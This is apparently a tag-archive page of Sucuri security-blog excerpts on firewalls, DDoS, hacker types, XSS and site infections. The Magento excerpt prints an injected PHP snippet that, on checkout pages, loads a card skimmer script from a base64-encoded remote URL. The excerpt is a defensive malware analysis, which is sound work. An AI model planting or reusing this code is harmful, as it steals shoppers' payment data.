Tag Archives: sucuri

Network Firewall vs. Web Application Firewall (WAF)

When the world shut their doors and began spending more time online, hackers saw a clear opportunity. The costs of data breaches continue to rise, and attacks are becoming harder to detect. Attackers are becoming more sophisticated and creative. According to a 2020 report by IBM, it took an average of 228 days to identify […]

7 Scary Good Tips to Secure Your Website

Nothing pairs quite as well as cybersecurity and Halloween. Prepare for more than trick-or-treaters this spooky season with these 5 wicked Website Security tips.  1 – Make a horcrux ( aka backup your data) – In Harry Potter, a horcrux lets wizards store a fragment of their soul in different objects as a safeguard against […]

5 Types of Hackers & Why They Hack

When considering why hackers are attacking websites, you might think that there’s a specific reason they target you as a website owner—your business, your reputation, or your information. The truth is, while it feels personal to the victim, hackers rarely single out specific targets. Most of the time, hackers perform mass searches for specific vulnerabilities, […]

How to Know If You Are Under DDoS Attack

Nowadays, the term DDoS probably raises the heart rate of most webmasters. Though many don’t know exactly what a DDoS attack is, they do know the effect: an extremely sluggish or shut-down website.  In this article, we’ll focus on how to know if your website is under attack and how to protect it.   Hopefully, we […]

Magento PHP Injection Loads JavaScript Skimmer

A Magento website owner was concerned about malware and reached out to our team for assistance. Upon investigation, we found the website contained a PHP injection in one of the Magento files: ./app/code/core/Mage/Payment/Model/Method/Cc.php … if ($_SERVER[“REQUEST_METHOD”] === “GET”){ if (strpos($_SERVER[“REQUEST_URI”], “/onestepcheckout/index/”) !== false){ if(!isset($_COOKIE[“adminhtml”])){ echo file_get_contents(base64_decode(“aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM=”)); } } } To make it more difficult to […]

Sucuri Sit-Down Episode 4: XSS & WP Plugin Vulnerabilities with Antony Garand

October is National Cyber Security Awareness Month, and we’re back with analyst Antony Garand to take a deeper look into cross site scripting (XSS) attacks and WordPress plugin vulnerabilities. Plus, host Justin Channell will catch you up on the latest website security news from the Sucuri blog. For further reading about any of these topics, […]

Redirects to YouTube Defacement Channel

During a recent investigation, we found an infected website was redirecting to YouTube after its main index.php file had been modified to include the following line of HTML: This technique works because it’s possible to use HTML within .php files — as long as the HTML is outside the PHP code tags. In this case, […]